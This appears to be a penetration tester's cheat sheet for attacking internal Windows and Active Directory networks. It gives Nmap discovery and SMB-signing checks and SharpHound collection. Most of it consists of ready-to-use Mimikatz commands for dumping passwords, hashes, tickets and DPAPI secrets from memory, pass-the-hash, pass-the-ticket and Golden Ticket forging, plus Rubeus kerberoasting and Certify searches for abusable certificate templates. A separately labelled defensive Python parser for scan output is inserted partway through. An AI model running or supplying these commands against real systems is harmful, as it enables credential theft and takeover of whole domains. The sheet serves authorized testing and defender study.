Internal (Windows)

Starting with some Nmap scans and scripts, we can gather plenty of additional information for more targeted testing and for finding other attack paths and vectors. Depending on whether we were given user credentials for a "compromised user" approach, we can then go down other paths, but either way we want to run all of these checks both with and without credentials.

We should also verify whether the machine is domain joined.

Nmap

  • Find up hosts:

nmap -sn -iL targets.txt -oG - | ForEach-Object { if ($_ -match "Up$") { ($_ -split ' ')[1] } } > up-hosts.txt
  • Scan and output to file:

nmap -p 80 --open -iL targets.txt > 80.txt
  • SMB signing not required (hosts where signing is enabled but not enforced):

nmap -p 445 -iL up-hosts.txt --script smb2-security-mode.nse > smb-signing-not-required.txt
  • SNMP info:

nmap -Pn -sV -p 161 --script=snmp-info IP
  • Extract the IPs from saved output into a list:

Select-String -Path "input.txt" -Pattern '\b(?:\d{1,3}\.){3}\d{1,3}\b' | ForEach-Object { $_.Matches.Value } > output.txt
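As an added defender-side example (not part of the original cheat sheet), a small Python parser for the smb2-security-mode scan output above: it maps each scanned host to its signing status and lists the hosts where signing is not enforced, so they can be queued for remediation (require SMB signing via policy). The sample scan text is constructed, and the script's wording is matched loosely on purpose.

```python
import re

# Constructed sample of nmap's normal output for
# `nmap -p 445 --script smb2-security-mode.nse` (not a real scan);
# lines the parser ignores (latency, PORT table) are omitted.
SAMPLE_SCAN = """\
Nmap scan report for dc01.corp.local (10.10.10.5)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.10.10.23
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.10.10.40
445/tcp closed microsoft-ds
"""

# Matches "Nmap scan report for host (1.2.3.4)" and "Nmap scan report for 1.2.3.4"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?")

def parse_signing(scan_text: str) -> dict[str, str]:
    """Map each scanned IP to 'required', 'not_required', 'disabled' or
    'unknown' (port closed or the script produced no result)."""
    results: dict[str, str] = {}
    host = None
    for line in scan_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            results[host] = "unknown"
            continue
        if host is None or "Message signing" not in line:
            continue
        # "not required" must be tested before "required".
        text = line.lower()
        if "not required" in text:
            results[host] = "not_required"
        elif "disabled" in text:
            results[host] = "disabled"
        elif "required" in text:
            results[host] = "required"
    return results

def weak_signing_hosts(scan_text: str) -> list[str]:
    """IPs to remediate: signing is present but not enforced, or off."""
    return sorted(ip for ip, status in parse_signing(scan_text).items()
                  if status in ("not_required", "disabled"))
```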

Sharphound

Collect ingest files for BloodHound (SharpHound uses --ldapusername/--ldappassword for explicit credentials):

Sharphound.exe --ldapusername USER --ldappassword 'PASSWORD' -d DOMAIN -c All

Mimikatz

Enable debug privileges

privilege::debug

sekurlsa

  • Extract credentials from the system's memory

sekurlsa::logonpasswords
sekurlsa::logonPasswords full
  • Dump and export Kerberos tickets from memory

sekurlsa::tickets /export
  • Pass the hash (PTH): start a process using an NTLM hash instead of a password

sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:HASH /run:cmd

kerberos

  • List and export the Kerberos tickets of the current user session

kerberos::list /export
  • Pass the ticket (PTT): inject a ticket into the current session

kerberos::ptt c:\TICKET
  • Create a Golden Ticket (/sid takes the domain SID, not a user SID)

kerberos::golden /user:DOMAIN-ADMIN /domain:DOMAIN /sid:DOMAIN-SID /krbtgt:KRBTGT /ticket:TICKET

TGT

  • The kerberos module interacts with and manipulates Kerberos tickets

kerberos

ekeys

  • Dump encryption keys from the system's memory

sekurlsa::ekeys

DPAPI

  • Extract and decrypt credentials protected by DPAPI (Data Protection API) from memory

sekurlsa::dpapi

Rubeus

Verify we can obtain a valid Kerberos ticket

.\Rubeus.exe asktgt /user:USER /password:PASSWORD

Dump all Kerberos tickets currently in memory for the logged-in user

.\Rubeus.exe dump

Export tickets to .kirbi files

.\Rubeus.exe dump /export

Requests a service ticket (TGS) for a specific service using an existing TGT.

.\Rubeus.exe asktgs /ticket:BASE-64-TICKET

Request service tickets for SPNs (Service Principal Names) associated with service accounts

.\Rubeus.exe kerberoast

List the Kerberos tickets cached in the current session (built-in Windows tool)

klist

Certify

Find all enabled certificate templates

.\Certify.exe find

Find vulnerable/abusable certificate templates

.\Certify.exe find /vulnerable
